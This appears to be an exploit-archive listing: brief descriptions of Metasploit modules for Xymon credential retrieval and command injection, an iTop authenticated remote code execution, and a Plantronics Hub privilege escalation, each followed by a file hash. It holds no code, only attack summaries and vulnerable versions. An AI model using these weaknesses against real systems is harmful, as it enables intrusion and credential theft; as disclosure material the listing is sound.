This Metasploit module retrieves information from a Xymon daemon service (formerly Hobbit, based on Big Brother), including server configuration information, a list of monitored hosts, and associated client log for each host. This Metasploit module also retrieves usernames and password hashes from the xymonpasswd config file from Xymon servers before 4.3.25, which permit download arbitrary config files (CVE-2016-2055), and servers configured with ALLOWALLCONFIGFILES enabled.
9ee70b9bf9b8edb046baafd8f5faf4f4a2796e5fb36f7a5b908641436a2306ab
iTop versions prior to 2.7.5 authenticated remote command execution exploit.
a0b99a6ffb1e72f424f072c032f45fd3c9811762bc3e6fd6ab9132aafab59e6c
The Plantronics Hub client application for Windows makes use of an automatic update service SpokesUpdateService.exe which automatically executes a file specified in the MajorUpgrade.config configuration file as SYSTEM. The configuration file is writable by all users by default. This module has been tested successfully on Plantronics Hub version 3.13.2 on Windows 7 SP1 (x64). This Metasploit module has been tested successfully on Plantronics Hub version 3.13.2 on Windows 7 SP1 (x64).
158f8bba58dd0cfb1693ccc6021434881f579c25482bb12c46542cc4b0abb810
Plantronics Hub version 3.13.2 suffers from a local privilege escalation vulnerability.
339cf6961e3d99bb3313daad76cb69c0c28d3894b10b7c2c36bed47bb3a1e73c
This Metasploit module exploits a command injection vulnerability in Xymon versions before 4.3.25 which allows authenticated users to execute arbitrary operating system commands as the web server user. When adding a new user to the system via the web interface with useradm.sh, the user's username and password are passed to htpasswd in a call to system() without validation. This module has been tested successfully on Xymon version 4.3.10 on Debian 6.
56921faf23d84d68f64c70045561cd00f989f797c3579b3de87eae4139a3e53c